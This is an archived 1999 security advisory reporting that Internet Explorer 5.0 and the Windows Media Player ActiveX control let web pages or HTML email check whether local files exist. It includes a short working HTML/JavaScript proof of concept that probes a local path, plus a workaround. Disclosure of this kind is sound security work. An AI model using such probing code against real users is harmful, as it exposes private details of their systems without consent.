IE 5.0 and Windows Media Player ActiveX object allow checking the existence of local files and directories Disclaimer: The opinions expressed in this advisory and program are my own and not of any company. The usual standard disclaimer applies, especially the fact that Georgi Guninski is not liable for any damages caused by direct or indirect use of the information or functionality provided by this program. Georgi Guninski, bears NO responsibility for content or misuse of this program or any derivatives thereof. Description: Internet Explorer 5.0 under Windows 95 (guess other versions are affected) and Windows Media Player ActiveX object allow checking the existence of local files and directories. This vulnerability may be exploited by HTML email or news group posting. Details: The problem is an error code returned by Windows Media Player ActiveX object when a file is attempted to be opened. Windows Media Player ActiveX object returns "-2147220970" error in the ErrorCode property when a file or directory does not exist but is tried to be opened. The code is: ---------------------------------------------------------------------------------------- <object id="wm" WIDTH=0 HEIGHT=0 classid="clsid:22D6F312-B0F6-11D0-94AB-0080C74C7E95" > </object> <SCRIPT> // -2147220970 function checkfile() { b=document.all.wm; b.FileName=document.forms[0].elements[0].value; if (b.ErrorCode == -2147220970) alert("File does not exist") else alert("File exists"); } </SCRIPT> <FORM> <INPUT TYPE="TEXT" VALUE="C:\AUTOEXEC.BAT" SIZE=60> <INPUT TYPE="SUBMIT" VALUE="Check file" onclick="checkfile()"> </FORM> ---------------------------------------------------------------------------------------- Workaround: Disable Active Scripting or Disable Script ActiveX Controls marked Safe for Scripting Demonstration is available at http://www.nat.bg/~joro/mscheckf.html Copyright 1999 Georgi Guninski Regards, Georgi Guninski http://www.nat.bg/~joro
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:12:15 PDT